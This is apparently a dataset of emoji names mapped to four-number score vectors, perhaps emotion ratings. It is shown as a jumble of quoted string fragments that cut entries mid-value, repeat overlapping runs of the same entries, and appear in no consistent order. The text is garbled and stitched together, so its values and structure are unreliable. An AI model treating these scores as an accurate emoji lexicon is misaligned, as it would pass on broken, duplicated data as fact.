0.134], \":person_swimming:\": [0.175, 0.159,", "[0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276,", "0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331,", "0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997],", "[0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149,", "0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149],", "0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], 
\":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\":", "[0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134,", "0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162,", "0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\":", "0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222,", "[0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179,", "\":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222,", "0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999],", "0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366],", "\":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166,", "0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003],", "0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004],", "0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 
0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138,", "[0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131,", "0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305],", "[0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003,", "0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255],", "0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998],", "0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003,", "0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\":", "[0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07,", "0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\":", "0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134],", "\":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263,", "[0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 
0.27699999999999997, 0.207,", "0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998,", "\":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179,", "[0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341,", "[0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003,", "0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134],", "\":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292,", "\":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217,", "0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23],", "0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266,", "0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\":", "0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\":", "0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 
0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\":", "0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997],", "0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\":", "[0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163,", "\":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998,", "\":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226,", "0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212],", "0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\":", "0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203,", "0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003],", "\":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997,", "0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163,", "\":blue_heart:\": 
[0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153,", "[0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337,", "[0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192,", "[0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136,", "\":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996,", "0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193],", "\":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141,", "[0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997,", "[0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33,", "\":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09,", "\":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998,", "[0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172,", "0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\":", 
"\":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998,", "\":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004,", "[0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168,", "0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\":", "\":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221,", "\":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195,", "0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998],", "\":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177,", "\":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081,", "[0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067,", "0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\":", "0.299, 
0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131],", "\":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163,", "0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233,", "0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201],", "[0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303,", "[0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326,", "0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\":", "\":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998,", "0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\":", "[0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179,", "0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113],", "0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158],", "0.22899999999999998], \":pizza:\": [0.142, 0.109, 
0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142,", "0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305,", "0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998],", "[0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998,", "[0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168,", "0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\":", "0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999,", "0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\":", "\":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16,", "[0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998,", "0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222],", "0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002,", "[0.34, 0.493, 0.161, 0.27], \":green_heart:\": 
[0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166,", "[0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001,", "0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084],", "0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998,", "0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154,", "[0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129,", "0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001],", "0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998,", "0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\":", "0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\":", "0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156],", "\":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002,", "0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": 
[0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156],", "0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203,", "0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154,", "0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218],", "0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\":", "[0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196,", "0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998,", "0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001,", "\":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185,", "0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147,", "\":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001,", "\":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 
0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191,", "[0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377,", "0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159,", "0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\":", "0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171,", "\":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077,", "0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\":", "0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\":", "0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26,", "0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\":", "[0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348,", "0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109,", "0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": 
[0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998,", "0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2],", "0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257],", "0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003,", "0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046],", "0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004,", "0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997,", "[0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003,", "0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252],", "0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177,", "\":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21,", "[0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282,", "0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": 
[0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251,", "\":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231,", "[0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145,", "0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228,", "\":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128,", "\":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136,", "0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27],", "0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139],", "\":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254,", "\":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002,", "[0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006,", "\":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375,", "\":e-mail:\": [0.26, 0.225, 0.21, 